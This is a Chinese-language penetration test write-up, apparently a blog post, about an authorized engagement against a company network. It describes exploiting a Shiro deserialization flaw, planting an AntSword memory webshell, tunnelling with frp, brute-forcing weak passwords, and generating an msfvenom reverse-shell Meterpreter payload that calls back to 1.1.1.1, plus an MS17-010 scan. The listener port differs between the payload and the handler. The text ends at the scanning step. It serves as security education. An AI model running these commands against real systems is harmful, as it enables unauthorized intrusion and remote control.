背景
最近都在做渗透测试项目,并不需要内网渗透,少了很多的成就感。于是,找了一个授权的企业项目,目标是获取内网核心权限,手段不限。这就好说了,就喜欢这种能让我胡乱来的目标。
入口对于企业而言,散落在外的资产肯定还有不少,于是为了快速打点,先进行一波常规的信息收集。先进行了子域名爆破、fofa、谷歌等方式找到多个子域,通过其中一个子域名反查找IP,在历史解析记录中找到了真实的IP,再继续进行C段端口扫描,收集到了多个资产列表。扔进XRAY跑一波,在其中的一个资产中,发现了存在shiro反序列话漏洞,手工来测试一下:
github上找个了工具尝试一下,发现可以执行命令:
查看了一下进程后,发现web是以jar包启动的,无法直接写入shell,直接尝试写内存shell:
成功写入了蚁剑的shell,先本地配置一下,并设置Accept-Header为:thisIsMyJob!@
设置好后直接连接,获取webshell:
内网漫游
翻看了一下这台linux上的文件,由于linux权限不够,无法查看shadow,尝试提权也均失败了,查看历史命令、计划任务等,并未有什么收获。只能下载jar包下来分析,找到了mysql数据库的配置密码。于是先探测一下内网,看能否快速的拿到其他主机的权限,不行再从数据库入手看看。
因此,先做了个代理,配置一下frp,先上传客户端到web上,修改了一下frpc.ini文件,使用sock代理:
自己的VPS上传服务端,修改一下权限,直接执行./frps -c frps.ini:
然后回到客户端执行一下./frpc -c frpc.ini,即可使用。
本地使用proxifier代理一下:
先使用弱口令爆破工具爆破一波看看,果然有点东西,找到了两台linux弱口令:
继续翻文件,还是一无所获,浪费了很多时间。可能核心业务不在linux上,尝试一下能否获取一个windows权限。先试试ms17-010漏洞,先生成一个木马:
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=2233 -f elf > linux.elf
上传到web上,本地msf监听一下:
use exploit/multi/handler set payload linux/x64/meterpreter/reverse_tcp show options set LHOST 1.1.1.1 set LPORT 23333 run
在web的命令行下给linux.elf添加执行权限后直接运行,即可获取到meterpreter。然后再添加一下路由:
使用17-010扫描模块跑一下: